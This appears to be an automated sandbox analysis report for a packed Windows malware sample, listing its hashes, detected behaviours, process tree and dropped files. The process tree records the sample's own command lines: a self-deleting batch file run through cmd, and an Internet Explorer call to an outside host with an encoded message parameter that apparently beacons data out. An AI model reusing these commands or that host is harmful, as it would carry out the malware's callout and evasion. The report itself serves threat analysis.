Analysis

  • max time kernel
    119s
  • max time network
    129s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    20/07/2024, 23:49

General

  • Target

    607b712779f98264e0b261dd6f29a546_JaffaCakes118.exe

  • Size

    158KB

  • MD5

    607b712779f98264e0b261dd6f29a546

  • SHA1

    7722827e9f5a5a1b0dc1787d07ec44a8fc7246c0

  • SHA256

    80047160819b2da2ba759cc33f725c623b7ee49ae19f3259dd6eb3c5d2038b6f

  • SHA512

    4422d3875254afba00a64dd6dbdf84eaf4d9683030886c982c88e9e77ae341ebefe36403eaa1c264e6c805a5947989ff781c64a7d12fcff38c98b3bf5a6a382c

  • SSDEEP

    3072:fwABjrG3Vi/cOBLUsmyi4AHhmTdI3wIe0HRDLVT/sOrVzzXg:oGjrUVecOJUsmdmdI3vPRDLp/s0zw

Score
7/10
upx

Malware Config

Signatures

  • Deletes itself 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\607b712779f98264e0b261dd6f29a546_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\607b712779f98264e0b261dd6f29a546_JaffaCakes118.exe"
    1⤵
    • Drops file in System32 directory
    • Checks processor information in registry
    • Suspicious use of WriteProcessMemory
    PID:2224
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\Users\Admin\AppData\Local\Temp\efa426735222bd0b4427334976035968.bat
      2⤵
      • Deletes itself
      PID:2776
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://wl.cabolar.com/v3062/repins.jpg?msg=aKjxqG7XPd167c5YWXjUvVx909vrLU8nh44yAR1waG8oTkMzfwl3S%2Fu%2Fr0xbT00hEPu29d7%2F72G9Supx0dpRjLS%2FD2N6oLD2%2FwijEGUOHVZZqAVIsmYY0fgcO59%2BZuUR
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2664
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2664 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2732

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    91f79064a17b3ddb091882dea2f7f8b8

    SHA1

    ba829e964d8b54b7b5707d1b1623ac13a62e3b68

    SHA256

    4b1ad54235b3465c6a99debb3e22d01369bdf9c3a850695a2f5a8d7745d97c58

    SHA512

    148493e0870d177ad5778d670e1a7f80826f0a5e86b3ddd367d42bbe3c664172c4232db50379498f9c0fe2e1b191352472eb2eb2fa12bcf20da71d17fc6f96d0

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    77329c95ec3897cbc66b91971a33b9f7

    SHA1

    91dd0af5911602ecb73e464d2b32dce5e6262e2f

    SHA256

    9197ab408498e26d78f89b0595273146c297a715e46ff90a5597341f0853057e

    SHA512

    b7d433496f207928d7aaa32c34ebb990a9fbd119390ad507541e1ed4d02b4a9a314326527a61f9624eaab13462c7b95ed861f529cd02faf8079d616970268924

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    61cfe42e8e9ff50d28fcdc1f595bd006

    SHA1

    cd3bd4d09de40cb1997af1af0a5b462abf026ebe

    SHA256

    c2d804c7351ae724788543a6e0c2c8750beb676d0936b429a3c1ec6cd62af6fe

    SHA512

    ed978004d4af282eca9eb115a70c5489b3620f1146a4067ebd01eedbd1b7ee89954e9cfb7d690f487f32a34cf37d1020bb255a9444678728e395323af2f63c55

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    3f43471666df021605de59b521c926db

    SHA1

    2b14935a6228b699ec227eb515d2571a9be051de

    SHA256

    f83b76ee6bdabb41edbb272ab707bb3764242979458d49f44ce883b1bfdbefc3

    SHA512

    bef6fba6fbc157e8e59b9e0f17bc5cbdf0180e8ece46a37120c6fc35ac4d76595baac15543d3edd553fd1598a380765e722cd910fae9a974be23639110e63eb4

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    6f85e8f4075d6c59b2e3e1708d7438fe

    SHA1

    c2b2ee3ec6ef6f413b2e2e1084283dbafaaabb29

    SHA256

    826942aa9deaaf553a8785f3b543adb46812d2885242b25ded65fa5d6e2ea554

    SHA512

    82aba509f91735d9ecd93cccf750fe0f7aa7431d54c2b1d924d422a28fb235e82173cb630a737a9a8aff97c5818497bcf94ce21374fd5f2df7fcf7c6a1520118

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    c4c67ba2418710e4b56f56aa53edb042

    SHA1

    aafd73949b6e658d94663fda905397a7aa40d3ec

    SHA256

    ffdd6c11d972bafa6f4e92db1875ee4594a1ec6ac21c35150ec684124930c5df

    SHA512

    2f27ab03aa483ac1fab7f14bc6e5e21f683d43cff7f373070e89c36cc091edfa670eba1b05d6a97df4fb63de2ea3092a70dd33cb76f5c69fc689e9fadc35f310

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    4ca74e6fd916ffa9237d12eae0ceadb0

    SHA1

    2f4ea8391a3372fd4e68c8d8830aa3f7762e4f9c

    SHA256

    04760d2b72dbe56572c07d81bde9f2deaed5afc39ead38d67cb6672d1bc757aa

    SHA512

    f6b5df9165f158596d42d285768b26e67f76ebad035cc55d2a03a4f42366fee7b71572670975c0c5d6d87a190bf7cf6e350c28a5c4cad0a85b7b2c45ac551164

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    8ad63be309008079e8166db22ea0722a

    SHA1

    d53e3478bbb0d52c7dd72c444f270f854465f931

    SHA256

    a4256813c8bf0ccaffec6500d078b77a034e992a9aa3eb81baccf5188407c3dc

    SHA512

    da95102d2055d6d800ae2d113263a4e0c16849a76d0cb6afa01d2628f87abadfe29be25a001485550b89fdeabb5c3e4ca925f0e00769d77c696f435ade939d1e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    4ae113286393c5bbef4c4a3eda611ad0

    SHA1

    ae81cce182bb5eb9fc57299eb4d0e431e1fd6857

    SHA256

    adb95b67e808cddf4fda28cc61d7922db12ed0ddfb270408fdb1ac0f4041c8ba

    SHA512

    113e8f6ec7aa6f56da0ba4c6e64504fd57beb8e5b0bf5dbc605f3c61e947a85dd90933f9df97fa4b27b2f9160bdd182eab2eadca9cf9519884f6f8343273ad60

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    bf2501da644c07e662976c2f1bb1dbf8

    SHA1

    36c3c5f282620ae0b780bd89c6f0929433a763e5

    SHA256

    7f5c0fc410dd448c24aec815e737b97b05b65b177f6ebd79913b98314481ebbb

    SHA512

    a2456021e55190289a879602ba6ba441b5e9491781aa07814d00964df0e00460da69b619bbb8997aa218d0072bff266fba755d87551f6ead59449d70b0370eff

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    cc769673916519ba7da8e32f56f5a312

    SHA1

    5c368929491e19c310940b2038ed1b387f418f97

    SHA256

    1616dd1f0cc2d13ca67bd28c940ae7dce47436765682327502585bad022fd5fa

    SHA512

    011f0a2a924646c7f9ed92676b3cf0b8f783462cd149cd8d43053d8ed535e4b0b4347e68469bd6de9fbf3d013ce163ea2b3fe39da11ae7251b8fe7de15086012

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    ddb05bdd48b802bc17f3cf0e1d2e2282

    SHA1

    fa242591d06a3cd06c274db0e5dd4abf0b2fcefd

    SHA256

    fabfbe0b75f5b317c988bd01d2a23b695adef275bd87029d92c8b6150f3f403d

    SHA512

    4a5c8d2ae5d655bb162b27bc3fcb25f449c13cc8545e9b7da5efc206370d4d7ad9b53b18cb6a7cc50325e28062f68428b11418108965f01de31dbe12bd549b06

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    b1ec9f579be24a7f214162fbd2e9df94

    SHA1

    5babd7d39177b954b5a45e308b62dc6b076685d3

    SHA256

    9f6541156a68c036df87fec1fbd8a9534cff712bb648b357d010cb401e4ad9c9

    SHA512

    b77dd1955d2decf1b6d614b04f3ac38d598814ddaf878864c5ddfaea499b6fcb78536ac75d5e50d39fc200f39a4c72ee9689a65eef08dd6aa05750c52a2d8450

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    b2170c7b16b8e7a9e9e78bdf20c501e7

    SHA1

    a36daf8c629849fd6edb94114fa3333eae986b5f

    SHA256

    0e6366b83450d975d2fa64d4c2d019a1be7267f635cc5675d960036eb251d939

    SHA512

    589147cdd0f0786e82554cecd6f00ec9549b135826c20b55ecad318c2933808da52b4bd73f700a82eb1def148bb3de10dea076e96da6e9a45c6b68712cba9b79

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    48a501b1981ea7ad5806380d745d5ed8

    SHA1

    edf18758a1e4a730aad9d1a52f80e7d33b236a1f

    SHA256

    000e2beffd4803ceb6bfdb8ed7c42f619683656461ed60bb3252a3179531c4ce

    SHA512

    1e64c8f8bd8b3e4dcd5c972572f20e10bfa7b02cd23a04b794fe141e3000e4604d0821e8f33b15e1e9e1075ae9e19777ec2b52559c2294aa13b1a1858c3ab6b2

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    3fd05dd096c5f1d2fa57605ea0469201

    SHA1

    0937813d23aeb0c5032204cc053f5f7a0118e581

    SHA256

    e334ca17aecc8fddecea10e499bdc240c51703f8209ff932256d1bb11c87a77b

    SHA512

    8be9a4304f1a731eac5ce5eb862f43a0f7e9ef5a94485fba23de3580a74b9709e4908eae360e86a1276ca376ba72c08cc1ca0905d5003535396f6a7594f1ec3a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    2bef95dd7261cddfc8b6b12ca1e42e20

    SHA1

    d0a7ff5d9596008461cd569dadbc4ac1420400f5

    SHA256

    44ab01574d27bcb726390e61c662133c07bcd6d77dbbc4ba0265560659e933b9

    SHA512

    3b343dcf352121c62a3c5657102c54f3c1b6e33db292f8b68979ae11694cdae6577b54445c4af3ad212a88a39784aee5721f5d6fb6dfb2a67618341448395553

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    9a2e79b1411a1db6a046b4997c6005ea

    SHA1

    06371779a081f3f896dda6705844bdbc325700df

    SHA256

    2e86659de0c1a16f805d41408b9cae59b897c7d4a17c09aa3ebc5bd07453f178

    SHA512

    d3dce2e8118607dc9a66f37fddedfa6b2705608c4771bb081a653d21722003433acd5f89a87b98c55e75c1c79044ad9ce842e323c356cb31b6ac1c01e3880f82

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    de72d6b1253cb8ee82c3af7454dba319

    SHA1

    150a1e54e9320fc68f17d6ebd9ec7e34af2768ba

    SHA256

    f92e74ee47085daa9910d51b9e0e868bc0a3953f31c456191c95b1bdc8d09f1e

    SHA512

    13393d9fc2c5c072e7fdb4f4b9a2d033f431a8d578567dc4513505622c73bc91e95bfced4acf6ebc4582f47f2f615ab9317bab638ec37ceae3f31e249d7ffbdb

  • C:\Users\Admin\AppData\Local\Temp\Cab7D4E.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\Tar7D70.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Local\Temp\efa426735222bd0b4427334976035968.bat

    Filesize

    209B

    MD5

    80cd991cf3a25c9a8c6806083bb75c91

    SHA1

    9b81d44aa458b0309226cba2bd1b0c73a3cb34f3

    SHA256

    8aa9f15b16050e12119a53ff74aea2ab586cae8d177e296ede4d45c65a8c8b8b

    SHA512

    81355318f9cbc6b2e814a2f5a140c01e3e9b0b29e7541153ff4824b6a935d361a25fe6e2098e46a2b86df2cf8219be3d964d6db42b945a7d0effd894f8d48143

  • memory/2224-16-0x0000000000400000-0x0000000000435000-memory.dmp

    Filesize

    212KB

  • memory/2224-7-0x0000000000400000-0x0000000000435000-memory.dmp

    Filesize

    212KB